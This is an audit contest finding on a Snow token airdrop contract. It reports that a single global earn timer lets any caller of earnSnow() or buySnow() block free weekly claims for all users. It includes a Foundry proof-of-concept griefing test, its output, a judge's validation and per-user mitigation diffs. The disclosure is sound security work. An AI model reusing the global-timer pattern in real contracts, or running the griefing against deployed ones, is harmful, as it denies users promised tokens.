Snowman Merkle Airdrop

AI First Flight #10
Beginner FriendlyFoundrySolidityNFT
EXP
View results
Submission Details
Severity: low
Valid

Global Earn Timer Enables Denial of Service on Free Token Distribution

Description

The Snow token contract allows users to earn 1 free Snow token per week via the earnSnow() function. This is intended to provide fair access to the airdrop for users who cannot afford to purchase tokens. Each user should have their own independent 1-week cooldown period.

The s_earnTimer variable is implemented as a single global uint256 instead of a per-user mapping. When any user calls earnSnow() or buySnow(), the timer is reset for ALL users, not just the caller. This allows an attacker to permanently block all users from earning free tokens by repeatedly resetting the global timer.

// src/Snow.sol:30
uint256 private s_earnTimer; // @> GLOBAL variable - affects all users!
// src/Snow.sol:92-99
function earnSnow() external canFarmSnow {
if (s_earnTimer != 0 && block.timestamp < (s_earnTimer + 1 weeks)) {
revert S__Timer(); // @> All users blocked by global timer
}
_mint(msg.sender, 1);
s_earnTimer = block.timestamp; // @> Resets timer for EVERYONE
}
// src/Snow.sol:79-90
function buySnow(uint256 amount) external payable canFarmSnow {
// ... minting logic ...
s_earnTimer = block.timestamp; // @> Also resets global timer!
emit SnowBought(msg.sender, amount);
}

Risk

Likelihood: High

  • The attack requires only calling earnSnow() or buySnow() once per week

  • Cost to attacker is minimal - just gas fees, or a small token purchase

  • No special permissions or tokens required to execute the attack

  • The vulnerability is triggered by normal contract usage

Impact: High

  • Complete denial of service on the free token distribution mechanism

  • Users who cannot afford to buy tokens are permanently excluded from the airdrop

  • Attacker can grief the entire user base with negligible cost

  • Breaks the fairness model of the token distribution

Proof of Concept

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.24;
import {Test, console2} from "forge-std/Test.sol";
import {Snow} from "../../src/Snow.sol";
import {MockWETH} from "../../src/mock/MockWETH.sol";
contract ExploitGlobalTimer is Test {
Snow snow;
MockWETH weth;
address attacker = makeAddr("attacker");
address victim = makeAddr("victim");
address collector = makeAddr("collector");
function setUp() public {
weth = new MockWETH();
snow = new Snow(address(weth), 1, collector);
deal(attacker, 100 ether);
}
function testExploit_PermanentDoS() public {
uint256 fee = snow.s_buyFee();
// Victim earns initial Snow
vm.prank(victim);
snow.earnSnow();
assertEq(snow.balanceOf(victim), 1);
// Attacker repeatedly resets the timer
for (uint256 i = 0; i < 3; i++) {
// Wait 6 days (not quite 1 week)
vm.warp(block.timestamp + 6 days);
// Attacker resets global timer
vm.prank(attacker);
snow.buySnow{value: fee}(1);
// Victim is blocked again
vm.prank(victim);
vm.expectRevert(Snow.S__Timer.selector);
snow.earnSnow();
}
// Victim can NEVER earn free Snow
}
function testExploit_CrossUserInterference() public {
// Victim1 earns Snow (timer starts)
vm.prank(victim);
snow.earnSnow();
// Wait 1 week
vm.warp(block.timestamp + 1 weeks);
// Attacker earns first (resets timer)
vm.prank(attacker);
snow.earnSnow();
// Victim's transaction now fails!
vm.prank(victim);
vm.expectRevert(Snow.S__Timer.selector);
snow.earnSnow(); // Blocked for another week
}
}

Test Output:

[PASS] testExploit_PermanentDoS() (gas: 212573)
Logs:
=== Exploit: Permanent DoS via buySnow() ===
[*] Victim1 earned initial Snow
[*] Day 6: 6 days passed
[*] Attacker called buySnow() - timer reset!
[!] Victim1 blocked again
[*] Day 12: 6 days passed
[*] Attacker called buySnow() - timer reset!
[!] Victim1 blocked again
[!] EXPLOIT SUCCESSFUL: Permanent DoS - victims can never earn
[!] Cost to attacker: Only gas + minimal token purchase

Recommended Mitigation

Change the timer from a global variable to a per-user mapping:

// src/Snow.sol
- uint256 private s_earnTimer;
+ mapping(address => uint256) private s_earnTimer;
function earnSnow() external canFarmSnow {
- if (s_earnTimer != 0 && block.timestamp < (s_earnTimer + 1 weeks)) {
+ if (s_earnTimer[msg.sender] != 0 && block.timestamp < (s_earnTimer[msg.sender] + 1 weeks)) {
revert S__Timer();
}
_mint(msg.sender, 1);
- s_earnTimer = block.timestamp;
+ s_earnTimer[msg.sender] = block.timestamp;
}
function buySnow(uint256 amount) external payable canFarmSnow {
if (msg.value == (s_buyFee * amount)) {
_mint(msg.sender, amount);
} else {
i_weth.safeTransferFrom(msg.sender, address(this), (s_buyFee * amount));
_mint(msg.sender, amount);
}
- s_earnTimer = block.timestamp;
+ // Remove this line - buySnow should not affect earnSnow timer
emit SnowBought(msg.sender, amount);
}
Updates

Lead Judging Commences

ai-first-flight-judge Lead Judge 9 days ago
Submission Judgement Published
Validated
Assigned finding tags:

[L-02] Global Timer Reset in Snow::buySnow Denies Free Claims for All Users

## Description: The `Snow::buySnow` function contains a critical flaw where it resets a global timer `(s_earnTimer)` to the current block timestamp on every invocation. This timer controls eligibility for free token claims via `Snow::earnSnow()`, which requires 1 week to pass since the last timer reset. As a result: Any token purchase `(via buySnow)` blocks all free claims for all users for 7 days Malicious actors can permanently suppress free claims with micro-transactions Contradicts protocol documentation promising **"free weekly claims per user"** ## Impact: * **Complete Denial-of-Service:** Free claim mechanism becomes unusable * **Broken Protocol Incentives:** Undermines core user acquisition strategy * **Economic Damage:** Eliminates promised free distribution channel * **Reputation Harm:** Users perceive protocol as dishonest ```solidity function buySnow(uint256 amount) external payable canFarmSnow { if (msg.value == (s_buyFee * amount)) { _mint(msg.sender, amount); } else { i_weth.safeTransferFrom(msg.sender, address(this), (s_buyFee * amount)); _mint(msg.sender, amount); } @> s_earnTimer = block.timestamp; emit SnowBought(msg.sender, amount); } ``` ## Risk **Likelihood**: • Triggered by normal protocol usage (any purchase) • Requires only one transaction every 7 days to maintain blockage • Incentivized attack (low-cost disruption) **Impact**: • Permanent suppression of core protocol feature • Loss of user trust and adoption • Violates documented tokenomics ## Proof of Concept **Attack Scenario:** Permanent Free Claim Suppression * Attacker calls **buySnow(1)** with minimum payment * **s\_earnTimer** sets to current timestamp (T0) * All **earnSnow()** calls revert for **next 7 days** * On day 6, attacker repeats **buySnow(1)** * New timer reset (T1 = T0+6 days) * Free claims blocked until **T1+7 days (total 13 days)** * Repeat step **4 every 6 days → permanent blockage** **Test Case:** ```solidity // Day 0: Deploy contract snow = new Snow(...); // s_earnTimer = 0 // UserA claims successfully snow.earnSnow(); // Success (first claim always allowed) // Day 1: UserB buys 1 token snow.buySnow(1); // Resets global timer to day 1 // Day 2: UserA attempts claim snow.earnSnow(); // Reverts! Requires day 1+7 = day 8 // Day 7: UserC buys 1 token (day 7 < day 1+7) snow.buySnow(1); // Resets timer to day 7 // Day 8: UserA retries snow.earnSnow(); // Still reverts! Now requires day 7+7 = day 14 ``` ## Recommended Mitigation **Step 1:** Remove Global Timer Reset from `buySnow` ```diff function buySnow(uint256 amount) external payable canFarmSnow { // ... existing payment logic ... - s_earnTimer = block.timestamp; emit SnowBought(msg.sender, amount); } ``` **Step 2:** Implement Per-User Timer in `earnSnow` ```solidity // Add new state variable mapping(address => uint256) private s_lastClaimTime; function earnSnow() external canFarmSnow { // Check per-user timer instead of global if (s_lastClaimTime[msg.sender] != 0 && block.timestamp < s_lastClaimTime[msg.sender] + 1 weeks ) { revert S__Timer(); } _mint(msg.sender, 1); s_lastClaimTime[msg.sender] = block.timestamp; // Update user-specific timer emit SnowEarned(msg.sender, 1); // Add missing event } ``` **Step 3:** Initialize First Claim (Constructor) ```solidity constructor(...) { // Initialize with current timestamp to prevent immediate claims s_lastClaimTime[address(0)] = block.timestamp; } ```

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.

Give us feedback!